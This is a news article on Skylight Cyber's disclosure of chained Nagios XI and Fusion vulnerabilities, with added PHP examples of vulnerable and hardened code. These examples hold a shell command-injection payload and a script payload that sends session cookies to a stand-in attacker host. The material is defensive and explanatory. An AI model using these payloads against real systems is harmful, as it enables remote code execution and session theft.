Cybersecurity researchers from Skylight Cyber disclosed technical details about 13 vulnerabilities in the Nagios network monitoring application that could be chained by threat actors to take over the monitoring infrastructure.
Nagios is an open-source IT infrastructure monitoring and alerting tool for mission-critical infrastructure components including applications, services, operating systems, network protocols, systems metrics, and network infrastructure.
The flaws discovered by the experts include Remote Code Execution and privilege escalation issues. The full list of vulnerabilities is below:
The researchers reported the flaws to Nagios in October 2020 and the company addressed them in November.
The most severe vulnerability, tracked as CVE-2020-28648, is an improper input validation issue in the Auto-Discovery component of Nagios XI that could be exploited by an authenticated attacker to achieve remote code execution. The flaw received a CVSS score of 8.8 and affects versions prior to 5.7.5.
“The bug that allows for this vulnerability is the use of an unsanitised command line in the call to the exec() function. The exec function is a PHP built-in function that will run operating system shell commands. It takes at least one argument which is the command line string that will be executed. If we can control the command line argument passed to the exec function, we can execute arbitrary shell commands.” reads the post published by the researchers.
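The bug class the researchers describe, shown here as an added illustration in PHP. This is not Nagios XI's own code: the handler, parameter name, command and sample payload are all assumptions. It places a hypothetical auto-discovery handler that concatenates a request parameter into the command line passed to exec() next to a hardened version that validates the value against an allow-list and quotes it with escapeshellarg() before exec() is reached.

```php
<?php
// Added example (not Nagios XI code). Demonstrates an unsanitised command
// line reaching PHP's exec(), and one way to close it.

// Builds the command line the way the vulnerable code would: raw concatenation.
function build_command_vulnerable(string $target): string
{
    return "nmap -sn " . $target; // hypothetical scan command
}

// Vulnerable: shell metacharacters in $target are interpreted by /bin/sh.
function discover_vulnerable(string $target): array
{
    $output = [];
    exec(build_command_vulnerable($target), $output);
    return $output;
}

// Hardened: reject anything that is not a host or CIDR token, then quote it so
// the remainder is passed to the program as one literal argument. The
// allow-list also blocks a leading "-", which escapeshellarg() alone would not
// stop from being read by nmap as an option.
function build_command_hardened(string $target): string
{
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9.\-]*(\/\d{1,2})?$/', $target)) {
        throw new InvalidArgumentException('invalid discovery target');
    }
    return 'nmap -sn ' . escapeshellarg($target);
}

function discover_hardened(string $target): array
{
    $output = [];
    $rc = 0;
    exec(build_command_hardened($target), $output, $rc);
    if ($rc !== 0) {
        throw new RuntimeException("discovery failed with exit code $rc");
    }
    return $output;
}

// Constructed payload: an authenticated attacker supplies a "target" that ends
// the intended command and appends one of their own.
$payload = '10.0.0.0/24; id > /tmp/pwned';

// The vulnerable path hands both commands to the shell.
echo build_command_vulnerable($payload), PHP_EOL;

// The hardened path refuses the value before any command is assembled.
try {
    echo build_command_hardened($payload), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// A legitimate target passes validation and is quoted as a single argument.
echo build_command_hardened('10.0.0.0/24'), PHP_EOL;
```

The example deliberately prints the assembled command lines rather than running the payload through discover_vulnerable(). Quoting is only half of the fix: without the allow-list, an argument such as "-iL /etc/passwd" would still be passed through to the program unchanged, so validate the shape of the value and quote it, and prefer a PHP-side library over a shell command where one exists.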
The researchers set out to demonstrate that, after compromising the Nagios XI install at one customer site, threat actors can attack upstream into the telco's network and from there attack all the remaining customers monitored through Nagios.
To do that, the researchers devised an attack chain composed of the following vulnerabilities and exploits:
Threat actors could exploit the CVE-2020-28648 and CVE-2020-28910 vulnerabilities to achieve RCE and elevate privileges to "root" on the customer's Nagios XI install. Once the attackers have compromised that XI install, they can return specially crafted data to the upstream Nagios Fusion server when it polls.
“The Nagios Fusion application periodically polls the fused Nagios XI servers to get information to display on various Fusion dashboards. The security model for doing this is inherently flawed since the Nagios Fusion will trust any data returned by the fused XI server.” continues the experts. “Since the data is trusted, the Nagios Fusion will display the information on various dashboards without sanitising the data. Therefore, by tainting data returned from the XI server under our control we can trigger Cross-Site Scripting and execute JavaScript code in the context of a Fusion user.”
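The trust problem in the quoted passage, modelled as an added PHP example that is not Nagios Fusion's own code. A constructed poll response stands in for what a compromised fused XI server could return; the field names, the rendering functions and the script payload are assumptions. The vulnerable renderer echoes the downstream data straight into HTML, while the hardened one treats it as untrusted input: it validates the shape of each field and HTML-encodes on output.

```php
<?php
// Added example (not Nagios Fusion code). A central server renders data
// returned by a polled downstream server; the fix is on the trusting side.

// Constructed poll response, as a compromised downstream server might return it.
$pollResponse = json_encode([
    'hosts' => [
        ['name' => 'web01', 'status' => 'UP'],
        ['name' => "<script>document.location='https://attacker.example/?c='+document.cookie</script>",
         'status' => 'UP'],
    ],
]);

// Vulnerable: whatever the downstream server sent becomes markup in the
// Fusion user's browser.
function render_vulnerable(array $hosts): string
{
    $html = '<table>';
    foreach ($hosts as $h) {
        $html .= "<tr><td>{$h['name']}</td><td>{$h['status']}</td></tr>";
    }
    return $html . '</table>';
}

// Hardened: validate each field against what it is supposed to be, then encode
// on output so anything that survives validation is inert in HTML.
function render_hardened(array $hosts): string
{
    $html = '<table>';
    foreach ($hosts as $h) {
        $name   = (string)($h['name'] ?? '');
        $status = (string)($h['status'] ?? '');
        if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9.\-]{0,252}$/', $name)) {
            $name = '(invalid host name)';
        }
        if (!in_array($status, ['UP', 'DOWN', 'UNREACHABLE'], true)) {
            $status = 'UNKNOWN';
        }
        $html .= '<tr><td>' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8')
               . '</td><td>' . htmlspecialchars($status, ENT_QUOTES | ENT_HTML5, 'UTF-8')
               . '</td></tr>';
    }
    return $html . '</table>';
}

$data = json_decode($pollResponse, true, 512, JSON_THROW_ON_ERROR);

echo render_vulnerable($data['hosts']), PHP_EOL; // script tag lands in the page verbatim
echo render_hardened($data['hosts']), PHP_EOL;   // second row is replaced and encoded
```

Encoding alone would already stop the script from executing, but it would still show attacker-chosen text on every operator's dashboard, which is why the shape check comes first. A Content-Security-Policy on the central server limits the damage if a rendering path is missed, but it does not remove the need to treat polled data as untrusted.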
The attackers then gain RCE on the Fusion server by exploiting the CVE-2020-28905 issue and elevate privileges by triggering the CVE-2020-28902 flaw, taking over the Fusion server. Having compromised the Fusion server, the attackers can compromise the XI servers located at other customer sites.
In summary, vulnerabilities like the ones discovered by the researchers could be exploited by threat actors in supply chain attacks with dramatic impact on the customers of the targeted organizations.
The experts pointed out that threat actors with sophisticated capabilities can easily discover vulnerabilities such as the ones they found in the Nagios architecture.
“While the SolarWinds attack was very different, as the vendor itself was targeted, it emphasised again the shift towards attacking 3rd party technology hubs, rather than a single target.” conclude the experts. “If we could do it as a quick side project, imagine how simple this is for people who dedicate their whole time to develop these types of exploits. Compound that with the number of libraries, tools and vendors that are present and can be leveraged in a modern network, and we have a major issue on our hands.”